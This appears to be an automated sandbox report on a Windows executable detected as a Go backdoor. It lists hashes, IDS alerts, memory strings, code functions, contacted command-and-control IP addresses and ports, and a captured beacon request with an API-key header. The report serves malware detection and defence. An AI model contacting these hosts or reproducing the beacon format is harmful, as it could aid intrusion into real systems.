Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.7838.24766.exe

Overview

General Information

Sample name:	SecuriteInfo.com.FileRepMalware.7838.24766.exe
Analysis ID:	1543364
MD5:	bdafcaf9ecd3f3310417e90d91e3e0fc
SHA1:	01ea5e3b71bd4e60dbf4be286f307712691f739f
SHA256:	514e8fc85ea7e17bc156b20c6ee967d290c030958bfc038a3e0ef065d28a0037
Tags:	exe
Infos:

Detection

GO Backdoor

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GO Backdoor

AI detected suspicious sample

Found Tor onion address

AV process strings found (often used to terminate AV products)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

SecuriteInfo.com.FileRepMalware.7838.24766.exe (PID: 3748 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe" MD5: BDAFCAF9ECD3F3310417E90D91E3E0FC)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: SecuriteInfo.com.FileRepMalware.7838.24766.exe PID: 3748	JoeSecurity_GOBackdoor	Yara detected GO Backdoor	Joe Security

Suricata Signatures

ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T18:44:47.971083+0100	2855536	1	A Network Trojan was detected	192.168.2.5	49990	88.218.60.50	13351	TCP

ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T18:45:17.207189+0100	2855537	1	A Network Trojan was detected	192.168.2.5	49990	88.218.60.50	13351	TCP

ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T18:45:17.476954+0100	2855538	1	A Network Trojan was detected	88.218.60.50	13351	192.168.2.5	49990	TCP

ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-27T18:44:47.970895+0100	2855539	1	A Network Trojan was detected	88.218.60.50	13351	192.168.2.5	49990	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 86.7% probability

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Binary string: C:\vmagent_new\bin\joblist\498883\out\Release\QHFileSmasher.pdb source: SecuriteInfo.com.FileRepMalware.7838.24766.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0046C990 FindFirstFileW,		0_2_0046C990
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0046D300 _memset,FindFirstFileW,FindNextFileW,FindNextFileW,		0_2_0046D300

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 88.218.60.50:13351 -> 192.168.2.5:49990
Source: Network traffic	Suricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.5:49990 -> 88.218.60.50:13351
Source: Network traffic	Suricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.5:49990 -> 88.218.60.50:13351
Source: Network traffic	Suricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 88.218.60.50:13351 -> 192.168.2.5:49990

Found Tor onion address

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340376529.00000000030C0000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3339979499.0000000002970000.00000040.00001000.00020000.00000000.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashquitermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermntohssse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remote390625uint16uint32uint64structchan<-<-chan ValueArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenhanguprdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerSTREETwindowsfloat32float64TuesdayJanuaryOctoberMUI_StdMUI_DltforcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused19531259765625invaliduintptrSwapperChanDir Value>ConvertAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalabortedCopySidWSARecvWSASendsignal os/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop traceinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp2clienthttp2server

Source: global traffic

TCP traffic: 192.168.2.5:49990 -> 88.218.60.50:13351

Source: Joe Sandbox View	IP Address: 46.8.232.106 46.8.232.106
Source: Joe Sandbox View	IP Address: 93.185.159.253 93.185.159.253

Source: Joe Sandbox View

ASN Name: E-STYLEISP-ASRU E-STYLEISP-ASRU

Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.232.106
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 46.8.236.61
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 93.185.159.253
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91
Source: unknown	TCP traffic detected without corresponding DNS query: 188.130.206.243
Source: unknown	TCP traffic detected without corresponding DNS query: 91.212.166.91

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe

Code function: 0_2_00454F30 DeleteUrlCacheEntryW,InternetOpenW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetSetOptionW,InternetOpenUrlW,InternetCloseHandle,HttpQueryInfoW,_memset,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

0_2_00454F30

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Host: 46.8.232.106User-Agent: Go-http-client/1.1Content-Length: 198X-Api-Key: eN7waNgsAccept-Encoding: gzipData Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 03 0d 37 05 07 02 03 04 01 58 50 30 00 0b 2e 5b 10 33 1e 32 0e 29 0f 10 09 2c 35 37 08 3d 06 10 07 58 09 1c 06 2c 3f 21 12 3c 2f 37 5d 59 21 2b 57 2a 0e 1a 56 5d 0d 56 58 0a 37 0e 45 4f 4d 1e 14 06 1f 1a 3a 1d 03 1b 09 02 02 0b 44 53 45 34 20 09 3e 5f 56 53 38 4c 4a 4b 17 11 00 16 1f 39 06 10 1c 19 09 1b 03 41 55 4c 12 23 26 32 07 01 2e 07 45 4f 4d 0c 13 00 0b 07 39 0b 14 1a 0e 0c 01 4c 5c 4b 57 2f 3d 1d 48 38 14 2e 5c 56 2a 1f 45 4f 4d 03 02 5c 45 59 4d 0c 02 08 01 00 0e 08 5f 0c 04 07 5c 08 55 5a 56 53 5b 5f 51 0c 5e 53 0b 57 57 0c 54 06 5f 08 05 4b 1a Data Ascii: M*L\K7XP0.[32),57=X,?!</7]Y!+W*V]VX7EOM:DSE4 >_VS8LJK9AUL#&2.EOM9L\KW/=H8.\V*EOM\EYM_\UZVS[_Q^SWWT_K

Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1BA000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243hI9utaoLtvGDps7s:m48/wSt/VxX44Hg627u.NAl8A8N.iqg2fpG3fDp2uKh.zcx11On0EJs6H75
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C122000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://188.130.206.243http://46.8.232.106
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1BA000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.232.106
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://46.8.236.61
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://91.212.166.91
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3340961503.000000000C10C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.7838.24766.exe, 00000000.00000002.3342143237.000000000C1D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://93.185.159.253
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	String found in binary or memory: http://s.360safe.com/safei18n/
Source: SecuriteInfo.com.FileRepMalware.7838.24766.exe	String found in binary or memory: http://www.360totalsecurity.com/d/ts/%s/%s/channelOpen
Source: shared.xml	String found in binary or memory: https://store.360totalsecurity.com/

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004171D5 NtQueryDefaultLocale,	0_2_004171D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004158C8 StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,	0_2_004158C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416050 NtQueryDefaultLocale,	0_2_00416050
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041612B NtQueryDefaultLocale,	0_2_0041612B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416246 NtQueryDefaultLocale,	0_2_00416246
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004162E6 NtQueryDefaultLocale,	0_2_004162E6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416468 NtQueryDefaultLocale,	0_2_00416468
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004164E8 NtQueryDefaultLocale,	0_2_004164E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416481 NtQueryDefaultLocale,	0_2_00416481
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041667D NtQueryDefaultLocale,	0_2_0041667D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004166AE NtQueryDefaultLocale,	0_2_004166AE
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416776 NtQueryDefaultLocale,	0_2_00416776
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416817 NtQueryDefaultLocale,	0_2_00416817
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004168F4 NtQueryDefaultLocale,	0_2_004168F4
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004169EC NtQueryDefaultLocale,	0_2_004169EC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416993 NtQueryDefaultLocale,	0_2_00416993
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00414A30 NtQueryDefaultLocale,	0_2_00414A30
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416CCA NtQueryDefaultLocale,	0_2_00416CCA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416CA5 NtQueryDefaultLocale,	0_2_00416CA5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416CB0 NtQueryDefaultLocale,	0_2_00416CB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416DDA NtQueryDefaultLocale,	0_2_00416DDA
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416D8F NtQueryDefaultLocale,	0_2_00416D8F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00414EC6 StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,	0_2_00414EC6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416E88 NtQueryDefaultLocale,	0_2_00416E88
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416FA1 NtQueryDefaultLocale,	0_2_00416FA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00417022 NtQueryDefaultLocale,	0_2_00417022
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041712E NtQueryDefaultLocale,	0_2_0041712E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00417133 NtQueryDefaultLocale,	0_2_00417133
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041718B NtQueryDefaultLocale,	0_2_0041718B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153D1 NtQueryDefaultLocale,NtQueryDefaultLocale,	0_2_004153D1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153FB NtQueryDefaultLocale,NtQueryDefaultLocale,	0_2_004153FB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153B1 StrStrIW,StrStrIW,StrStrIW,NtQueryDefaultLocale,NtQueryDefaultLocale,	0_2_004153B1
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153B6 NtQueryDefaultLocale,NtQueryDefaultLocale,	0_2_004153B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004153BD NtQueryDefaultLocale,NtQueryDefaultLocale,	0_2_004153BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041741B NtQueryDefaultLocale,	0_2_0041741B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00415424 NtQueryDefaultLocale,NtQueryDefaultLocale,	0_2_00415424
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00417430 NtQueryDefaultLocale,	0_2_00417430

Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041E805	0_2_0041E805
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004171D5	0_2_004171D5
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004158C8	0_2_004158C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416050	0_2_00416050
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00410055	0_2_00410055
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041C004	0_2_0041C004
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041C026	0_2_0041C026
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041C0CB	0_2_0041C0CB
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040609D	0_2_0040609D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041612B	0_2_0041612B
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041C137	0_2_0041C137
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_004061FC	0_2_004061FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040618E	0_2_0040618E
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00406194	0_2_00406194
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041C19A	0_2_0041C19A
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040619F	0_2_0040619F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00416246	0_2_00416246
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0040C21D	0_2_0040C21D
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041021F	0_2_0041021F
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041C223	0_2_0041C223
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00446220	0_2_00446220
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_00410230	0_2_00410230
Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.7838.24766.exe	Code function: 0_2_0041C23F	0_2_0041C23F
